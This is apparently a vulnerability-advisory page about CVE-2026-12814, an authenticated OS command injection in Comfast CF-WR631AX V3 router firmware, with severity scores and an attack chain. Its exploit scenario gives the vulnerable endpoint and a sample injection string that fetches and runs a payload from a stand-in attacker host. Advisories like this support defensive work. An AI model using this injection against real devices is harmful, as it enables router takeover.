Skip to main content

Comfast CF-WR631AX CVE-2026-12814

| EUVDEUVD-2026-38200 LOW
OS Command Injection (CWE-78)
2026-06-21 VulDB GHSA-fvx9-6cqj-p3f8
2.1
CVSS 4.0 · Vendor: VulDB

Severity by source

Vendor (VulDB) PRIMARY
2.1 MEDIUM
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
9.9 CRITICAL

PR:L for required authentication; S:C and H/H/H because OS command injection on router firmware breaks application boundary, yielding full system root access.

3.1 AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
4.0 AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from Vendor (VulDB).

CVSS VectorVendor: VulDB

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
X

Lifecycle Timeline

3
Analysis Generated
Jun 22, 2026 - 06:48 vuln.today
Severity Changed
Jun 21, 2026 - 23:22 NVD
MEDIUM LOW
CVSS changed
Jun 21, 2026 - 23:22 NVD
5.3 (MEDIUM) 2.1 (LOW)

DescriptionCVE.org

A flaw has been found in Comfast CF-WR631AX V3 up to 2.7.0.8. This issue affects the function system of the file /cgi-bin/mbox-config?section=ping_config of the component API Endpoint. This manipulation of the argument destination causes os command injection. The attack is possible to be carried out remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

AnalysisAI

OS command injection in Comfast CF-WR631AX V3 firmware (versions 2.7.0.0 through 2.7.0.8) allows an authenticated remote attacker to execute arbitrary operating system commands by injecting shell metacharacters into the destination parameter of the ping configuration API endpoint at /cgi-bin/mbox-config?section=ping_config. A detailed public exploit analysis report is available on GitHub, materially lowering the exploitation barrier, though no CISA KEV listing confirms active in-the-wild campaigns at time of analysis. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Acquire router admin credentials (default or stolen)
Delivery
Authenticate to web management interface over HTTP
Exploit
Send crafted POST to /cgi-bin/mbox-config?section=ping_config
Execution
Inject shell metacharacters into destination parameter
Persist
system() executes injected OS commands as privileged process
Impact
Achieve persistent router compromise

Vulnerability AssessmentAI

Exploitation Exploitation requires an authenticated session on the router's administrative web interface, consistent with CVSS PR:L - the attacker must possess valid credentials for the management panel. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The provided CVSS 4.0 vector (AV:N/AC:L/AT:N/PR:L/UI:N) correctly characterizes this as a low-complexity, network-accessible flaw requiring only authenticated access - all consistent with targeting a router admin panel over HTTP. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker who has obtained valid router administrative credentials - whether through credential stuffing against default credentials, phishing, or prior network compromise - sends a crafted HTTP request to /cgi-bin/mbox-config?section=ping_config with a `destination` parameter containing shell metacharacters such as `8.8.8.8; wget http://attacker.com/payload -O /tmp/p; chmod +x /tmp/p; /tmp/p`, causing the router's CGI handler to pass the injected string to the system shell and execute arbitrary commands. A full technical analysis report with exploit details is publicly available on GitHub, meaning a moderately skilled attacker can weaponize this with minimal effort. …
Remediation No vendor-released patch has been identified at time of analysis; the vendor did not respond to responsible disclosure. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-12814 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy